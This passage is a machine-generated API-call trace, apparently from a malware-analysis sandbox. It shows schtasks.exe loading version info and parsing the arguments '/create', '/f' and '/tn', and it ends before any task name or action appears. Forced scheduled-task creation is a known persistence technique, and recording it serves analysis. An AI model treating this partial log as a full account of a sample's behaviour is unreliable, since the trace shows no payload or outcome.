[0169.550] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0169.550] VerifyVersionInfoW (in: lpVersionInformation=0x28f748, dwTypeMask=0x3, dwlConditionMask=0x1801b | out: lpVersionInformation=0x28f748) returned 1
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304ba8
[0169.550] lstrlenW (lpString="") returned 0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x2) returned 0x304f90
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fa0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.550] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bc0
[0169.550] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fc0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x304fe0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305000
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305020
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bd8
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305040
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305060
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305080
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050a0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304bf0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050c0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3050e0
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305118
[0169.551] GetProcessHeap () returned 0x2f0000
[0169.551] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305138
[0169.551] SetThreadUILanguage (LangId=0x0) returned 0x409
[0169.552] SetLastError (dwErrCode=0x0)
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305158
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305178
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305198
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3051b8
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3051d8
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c08
[0169.552] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.552] GetProcessHeap () returned 0x2f0000
[0169.552] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x208) returned 0x305a80
[0169.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x305a80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0169.553] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x733a0000
[0169.555] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoSizeW") returned 0x733a19d9
[0169.555] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0169.555] GetProcessHeap () returned 0x2f0000
[0169.555] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x74e) returned 0x305c90
[0169.556] GetProcAddress (hModule=0x733a0000, lpProcName="GetFileVersionInfoW") returned 0x733a19f4
[0169.556] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x305c90 | out: lpData=0x305c90) returned 1
[0169.556] GetProcAddress (hModule=0x733a0000, lpProcName="VerQueryValueW") returned 0x733a1b51
[0169.556] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28f850, puLen=0x28f854 | out: lplpBuffer=0x28f850*=0x30602c, puLen=0x28f854) returned 1
[0169.562] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.562] _vsnwprintf (in: _Buffer=0x305a80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x28f838 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0169.562] VerQueryValueW (in: pBlock=0x305c90, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x28f860, puLen=0x28f85c | out: lplpBuffer=0x28f860*=0x305e58, puLen=0x28f85c) returned 1
[0169.562] lstrlenW (lpString="schtasks.exe") returned 12
[0169.562] lstrlenW (lpString="schtasks.exe") returned 12
[0169.562] lstrlenW (lpString=".EXE") returned 4
[0169.562] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0169.564] lstrlenW (lpString="schtasks.exe") returned 12
[0169.564] lstrlenW (lpString=".EXE") returned 4
[0169.564] _memicmp (_Buf1=0x304c08, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.564] lstrlenW (lpString="schtasks") returned 8
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305218
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305238
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305258
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305278
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c68
[0169.565] _memicmp (_Buf1=0x304c68, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa0) returned 0x306670
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305298
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052b8
[0169.565] GetProcessHeap () returned 0x2f0000
[0169.565] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052d8
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c80
[0169.566] _memicmp (_Buf1=0x304c80, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x200) returned 0x306718
[0169.566] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x306718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0169.566] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x30) returned 0x306920
[0169.566] _vsnwprintf (in: _Buffer=0x306670, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x28f83c | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90) returned 1
[0169.566] GetProcessHeap () returned 0x2f0000
[0169.566] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x305c90) returned 0x74e
[0169.567] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305c90 | out: hHeap=0x2f0000) returned 1
[0169.567] SetLastError (dwErrCode=0x0)
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="?") returned 1
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="create") returned 6
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="delete") returned 6
[0169.567] GetThreadLocale () returned 0x409
[0169.567] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.567] lstrlenW (lpString="query") returned 5
[0169.567] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="change") returned 6
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="run") returned 3
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="end") returned 3
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] lstrlenW (lpString="showsid") returned 7
[0169.568] GetThreadLocale () returned 0x409
[0169.568] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0169.568] SetLastError (dwErrCode=0x0)
[0169.568] SetLastError (dwErrCode=0x0)
[0169.568] lstrlenW (lpString="/create") returned 7
[0169.568] lstrlenW (lpString="-/") returned 2
[0169.568] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.568] lstrlenW (lpString="?") returned 1
[0169.568] lstrlenW (lpString="?") returned 1
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304c98
[0169.568] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0xa) returned 0x304cb0
[0169.568] lstrlenW (lpString="create") returned 6
[0169.568] GetProcessHeap () returned 0x2f0000
[0169.568] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x10) returned 0x304cc8
[0169.569] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x3052f8
[0169.569] _vsnwprintf (in: _Buffer=0x304cb0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.569] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] lstrlenW (lpString="|?|") returned 3
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.569] SetLastError (dwErrCode=0x490)
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304cb0) returned 1
[0169.569] GetProcessHeap () returned 0x2f0000
[0169.569] RtlReAllocateHeap (Heap=0x2f0000, Flags=0xc, Ptr=0x304cb0, Size=0x14) returned 0x305318
[0169.569] lstrlenW (lpString="create") returned 6
[0169.569] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.569] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.569] lstrlenW (lpString="|create|") returned 8
[0169.570] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|"
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] SetLastError (dwErrCode=0x0)
[0169.570] lstrlenW (lpString="/f") returned 2
[0169.570] lstrlenW (lpString="-/") returned 2
[0169.570] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.570] lstrlenW (lpString="?") returned 1
[0169.570] lstrlenW (lpString="?") returned 1
[0169.570] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] lstrlenW (lpString="f") returned 1
[0169.570] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.570] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.570] lstrlenW (lpString="|?|") returned 3
[0169.570] lstrlenW (lpString="|f|") returned 3
[0169.570] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0169.570] SetLastError (dwErrCode=0x490)
[0169.570] lstrlenW (lpString="create") returned 6
[0169.570] lstrlenW (lpString="create") returned 6
[0169.570] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] lstrlenW (lpString="f") returned 1
[0169.570] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.570] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.570] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|create|") returned 8
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.571] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0169.571] SetLastError (dwErrCode=0x490)
[0169.571] lstrlenW (lpString="delete") returned 6
[0169.571] lstrlenW (lpString="delete") returned 6
[0169.571] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] lstrlenW (lpString="f") returned 1
[0169.571] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.571] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|delete|") returned 8
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.571] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0169.571] SetLastError (dwErrCode=0x490)
[0169.571] lstrlenW (lpString="query") returned 5
[0169.571] lstrlenW (lpString="query") returned 5
[0169.571] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] lstrlenW (lpString="f") returned 1
[0169.571] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.571] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.571] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.571] lstrlenW (lpString="|query|") returned 7
[0169.571] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="change") returned 6
[0169.572] lstrlenW (lpString="change") returned 6
[0169.572] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] lstrlenW (lpString="f") returned 1
[0169.572] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.572] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.572] lstrlenW (lpString="|change|") returned 8
[0169.572] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="run") returned 3
[0169.572] lstrlenW (lpString="run") returned 3
[0169.572] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] lstrlenW (lpString="f") returned 1
[0169.572] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.572] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.572] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.572] lstrlenW (lpString="|run|") returned 5
[0169.572] lstrlenW (lpString="|f|") returned 3
[0169.572] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0169.572] SetLastError (dwErrCode=0x490)
[0169.572] lstrlenW (lpString="end") returned 3
[0169.572] lstrlenW (lpString="end") returned 3
[0169.573] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] lstrlenW (lpString="f") returned 1
[0169.573] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] _vsnwprintf (in: _Buffer=0x305318, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|end|") returned 5
[0169.573] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.573] lstrlenW (lpString="|end|") returned 5
[0169.573] lstrlenW (lpString="|f|") returned 3
[0169.573] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0169.573] SetLastError (dwErrCode=0x490)
[0169.573] lstrlenW (lpString="showsid") returned 7
[0169.573] lstrlenW (lpString="showsid") returned 7
[0169.573] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] GetProcessHeap () returned 0x2f0000
[0169.573] HeapValidate (hHeap=0x2f0000, dwFlags=0x0, lpMem=0x305318) returned 1
[0169.573] GetProcessHeap () returned 0x2f0000
[0169.573] RtlReAllocateHeap (Heap=0x2f0000, Flags=0xc, Ptr=0x305318, Size=0x16) returned 0x305338
[0169.573] lstrlenW (lpString="f") returned 1
[0169.573] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.573] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0xa, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|showsid|") returned 9
[0169.573] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|f|") returned 3
[0169.573] lstrlenW (lpString="|showsid|") returned 9
[0169.573] lstrlenW (lpString="|f|") returned 3
[0169.573] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0169.573] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/f") returned 2
[0169.574] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0169.574] SetLastError (dwErrCode=0x490)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/f") returned 2
[0169.574] GetProcessHeap () returned 0x2f0000
[0169.574] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x6) returned 0x306958
[0169.574] GetProcessHeap () returned 0x2f0000
[0169.574] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0xc, Size=0x14) returned 0x305318
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] SetLastError (dwErrCode=0x0)
[0169.574] lstrlenW (lpString="/tn") returned 3
[0169.574] lstrlenW (lpString="-/") returned 2
[0169.574] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0169.574] lstrlenW (lpString="?") returned 1
[0169.574] lstrlenW (lpString="?") returned 1
[0169.574] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.574] lstrlenW (lpString="tn") returned 2
[0169.574] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.574] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x4, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|?|") returned 3
[0169.574] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.574] lstrlenW (lpString="|?|") returned 3
[0169.574] lstrlenW (lpString="|tn|") returned 4
[0169.574] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="create") returned 6
[0169.575] lstrlenW (lpString="create") returned 6
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] lstrlenW (lpString="tn") returned 2
[0169.575] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|create|") returned 8
[0169.575] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.575] lstrlenW (lpString="|create|") returned 8
[0169.575] lstrlenW (lpString="|tn|") returned 4
[0169.575] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0
[0169.575] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="delete") returned 6
[0169.575] lstrlenW (lpString="delete") returned 6
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] lstrlenW (lpString="tn") returned 2
[0169.575] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.575] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|delete|") returned 8
[0169.575] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.575] lstrlenW (lpString="|delete|") returned 8
[0169.575] lstrlenW (lpString="|tn|") returned 4
[0169.575] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0
[0169.575] SetLastError (dwErrCode=0x490)
[0169.575] lstrlenW (lpString="query") returned 5
[0169.575] lstrlenW (lpString="query") returned 5
[0169.575] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] lstrlenW (lpString="tn") returned 2
[0169.576] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x8, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|query|") returned 7
[0169.576] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.576] lstrlenW (lpString="|query|") returned 7
[0169.576] lstrlenW (lpString="|tn|") returned 4
[0169.576] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0
[0169.576] SetLastError (dwErrCode=0x490)
[0169.576] lstrlenW (lpString="change") returned 6
[0169.576] lstrlenW (lpString="change") returned 6
[0169.576] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] lstrlenW (lpString="tn") returned 2
[0169.576] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.576] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x9, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|change|") returned 8
[0169.576] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.576] lstrlenW (lpString="|change|") returned 8
[0169.576] lstrlenW (lpString="|tn|") returned 4
[0169.576] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0
[0169.576] SetLastError (dwErrCode=0x490)
[0169.576] lstrlenW (lpString="run") returned 3
[0169.576] lstrlenW (lpString="run") returned 3
[0169.576] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.577] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] _vsnwprintf (in: _Buffer=0x305338, _BufferCount=0x6, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|run|") returned 5
[0169.577] _vsnwprintf (in: _Buffer=0x3052f8, _BufferCount=0x5, _Format="|%s|", _ArgList=0x28f824 | out: _Buffer="|tn|") returned 4
[0169.577] lstrlenW (lpString="|run|") returned 5
[0169.577] lstrlenW (lpString="|tn|") returned 4
[0169.577] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0
[0169.577] SetLastError (dwErrCode=0x490)
[0169.577] lstrlenW (lpString="end") returned 3
[0169.577] lstrlenW (lpString="end") returned 3
[0169.577] _memicmp (_Buf1=0x304c98, _Buf2=0x2c1ed8, _Size=0x7) returned 0
[0169.577] lstrlenW (lpString="tn") returned 2
[0169.577] _memicmp (_Buf1=0x304cc8, _Buf2=0x2c1ed8, _Size=0x7) returned 0
